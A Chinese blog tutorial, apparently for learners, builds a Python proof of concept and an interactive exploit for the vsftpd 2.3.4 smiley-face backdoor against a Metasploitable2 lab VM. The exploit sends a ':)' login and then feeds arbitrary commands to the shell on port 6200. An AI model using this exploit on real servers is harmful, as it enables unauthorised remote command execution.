使用python制作一个针对vsftpd2.3.4的exp和poc_没有值的博客-爱代码爱编程
文章目录
一、漏洞介绍
本次攻击的程序为vsftpd2.3.4版本,这个版本出现了一个高危漏洞——当输入的ftp用户名或密码出现连续的:)时,会在本地开启6200端口,当连接这个端口时,输入的任何内容会当作系统命令来执行
二、环境搭建
2.1 镜像下载
这里我用metasploitable2来作为本次攻击的对象(这是一个存在很多漏洞的Linux设备,大家之后也可以对它进行其他攻击),由于官网下载太慢了,我这里提供了百度网盘的连接
https://pan.baidu.com/s/13X7JSUGcF2lR8jS_BvARow
提取码:fgwa
2.2 创建metasploitable虚拟机
将metasploitable下载后解压到一个地方,然后打开VMware,点击打开虚拟机
选中解压的文件夹里的.vmx文件,点击打开。将虚拟机的网络适配器调成桥接
打开虚拟机,默认的用户名和密码是msfadmin
至此,环境搭建完毕
三、制作Poc
3.1 捕捉登录数据包
在上面已经介绍的漏洞的信息,那我们现在就来用Python构造一个登录数据包发送过去
首先打开抓包软件(如果没有可以跳过这步),这里我用kali自带的Wireshark,这是一款非常好用的抓包软件
我们开启两个终端,一个负责抓包,一个负责登录(如果你没有安装kali,可以用cmd)
在终端输入wireshark,在wireshark界面双击你所使用的网卡(通常,有线是eth0,无线是wlan),我用的是eth0。在这里,我们可以看到很多数据包
这里过滤一下其他数据包,数据包太多会影响,我们可以在上面的输入框输入ftp,这表示只显示ftp数据包
在另一个终端输入ftp,然后输入open [靶机IP]
回车,然后会显示输入用户名和密码,我们随便输入,比如abc(注意,密码不是不输入,而是不显示)
返回wireshark查看一下
用户名数据包
密码数据包
可以看到,用户名是USER [用户名]\r\n格式,密码是PASS [密码]\r\n格式,这里的\r是回车符\n是换行符,现在我们就用Python实现登录
3.2 Python构造登录数据包
import socket,time #导入所需的socket和time库,socket是一个网络编程库,time是和时间有关的库
"""
这里导入time库的原因是:让目标有足够的时间处理数据,不然还没处理完就发,会出现不准确的现象
"""
s = socket.socket() #创建socket实例这里的s可以改成其他的
target = "192.168.8.152" #目标IP地址
port = 21 #FTP端口
s.connect((target,port)) #连接目标FTP
time.sleep(1) #调用time的sleep函数停顿1秒
login_name = b"USER abc\r\n" #构造用户名,这里必须转换为字节流,在""或''前面加上b即可
login_password = b"PASS abc\r\n" #构造密码
s.send(login_name) #发送登录用户名
time.sleep(1)
s.send(login_password) #发送登录密码
print("发送成功")
s.close() #关闭连接,释放资源
执行完,我们可以去wireshark查看是否成功
看其中一个就可以了,毕竟都是一样的
3.3 Python制作Poc
我们已经知道如何去构造数据包登录了,那我们就开始制作Poc
我们可以向目标发送一个带有:)的用户名和密码的登录包,然后尝试连接目标的6200端口,可以连接就证明存在漏洞,反之没有(在socket模块里连接失败会报错,所以这里用try/except语句)
import socket, time
s = socket.socket()
target = "192.168.8.152"
port = 21
s.connect((target,port))
time.sleep(1)
login_name = b"USER abc:)\r\n"
login_password = b"PASS abc:)\r\n"
s.send(login_name)
time.sleep(1)
s.send(login_password)
print("发送成功")
try:
a = socket.socket() #重新创建一个socket实例用于连接6200端口
a.connect((target,6200))
print("存在笑脸漏洞") #如果上面连接目标的6200端口不成功会执行except语句,这句不会被执行
except BaseException:
print("不存在笑脸漏洞")
s.close()
Poc做出来了,如果想自定义,可以这样写:
import socket, time
s = socket.socket()
try:
target = input("请输入目标IP:")
port = int(input("请输入目标端口")) #这里将输入的内容转换为int类型
except BaseException:
print("未知错误!")
s.connect((target,port))
time.sleep(1)
login_name = b"USER abc:)\r\n"
login_password = b"PASS abc:)\r\n"
s.send(login_name)
time.sleep(1)
s.send(login_password)
print("发送成功")
try:
a = socket.socket() #重新创建一个socket实例用于连接6200端口
a.connect((target,6200))
print("存在笑脸漏洞") #如果上面连接目标的6200端口不成功会执行except语句,这句不会被执行
except BaseException:
print("不存在笑脸漏洞")
s.close()
四、制作Exp
4.1 Python制作Exp
比如向对方发送一条查看当前用户的指令:whoami
import socket, time
s = socket.socket()
try:
target = input("请输入目标IP:")
port = int(input("请输入目标端口"))
except BaseException:
print("未知错误!")
s.connect((target,port))
time.sleep(1)
login_name = b"USER abc:)\r\n"
login_password = b"PASS abc:)\r\n"
s.send(login_name)
time.sleep(1)
s.send(login_password)
print("发送成功")
try:
a = socket.socket()
a.connect((target,6200))
print("存在笑脸漏洞")
data = b"whoami\n" #必须在末尾添加\n,不然就相当于输入不回车
a.send(data)
print(a.recv(1024)) #打印出接受到的消息,这里接受1M消息
except BaseException:
print("不存在笑脸漏洞")
s.close()
这里的返回也是字节流类型,并且也在末尾加上了\n
当然,可以自定义:
import socket, time
s = socket.socket()
try:
target = input("请输入目标IP:")
port = int(input("请输入目标端口"))
except BaseException:
print("未知错误!")
s.connect((target,port))
time.sleep(1)
login_name = b"USER abc:)\r\n"
login_password = b"PASS abc:)\r\n"
s.send(login_name)
time.sleep(1)
s.send(login_password)
print("发送成功")
try:
a = socket.socket()
a.connect((target,6200))
print("存在笑脸漏洞")
except BaseException:
print("不存在笑脸漏洞")
try:
while True:
command = input("请输入您要执行的命令:")
command += "\n" #在变量末尾加上\n
command = bytes(command,encoding="UTF-8") #将变量转换为字节流类型,编码是UTF-8
a.send(command)
print(a.recv(1024))
except BaseException:
print("未知错误!")
s.close()
Exp制作完毕,如果执行的是ifconfig或者其他返回值比较长的命令行会出现这个情况:
凑合着看吧